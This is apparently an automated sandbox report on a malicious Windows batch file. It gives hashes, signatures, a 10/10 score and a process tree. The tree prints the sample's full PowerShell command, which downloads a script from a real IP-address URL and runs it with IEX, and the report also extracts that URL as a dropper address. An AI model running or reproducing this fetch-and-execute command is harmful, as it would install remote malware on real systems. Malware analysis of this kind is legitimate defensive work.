Analysis

  • max time kernel
    137s
  • max time network
    67s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    20-05-2020 14:10

General

  • Target

    76268c9536af4328d6c0da30152c5045.bat

  • Size

    215B

  • MD5

    572a573b2da48bc8e094db663f4d54cd

  • SHA1

    3f06e7dc06fac49d4c675ad67cd2ba2113fb6d1e

  • SHA256

    8f7ad3b1ae4a99516d4e47fa682097895f767f07cbaf4ac432636610ca16a237

  • SHA512

    d90c574c7012e4e58968023d625d18ccf5f713a2a9888e86bb10d692b5db6d9496cc0f3de1778ddfafebf64b5146ca625a58e09e2a939e7140cea9a00521b30d

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045

Signatures

  • Program crash 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\76268c9536af4328d6c0da30152c5045.bat"
    1⤵
      PID:640
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045');Invoke-ANLMXOIN;Start-Sleep -s 10000"
        2⤵
          PID:904
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 904 -s 704
            3⤵
            • Program crash
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious behavior: EnumeratesProcesses
            PID:1148

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1148-0-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

        Filesize

        4KB

      • memory/1148-2-0x00000000050E0000-0x00000000050E1000-memory.dmp

        Filesize

        4KB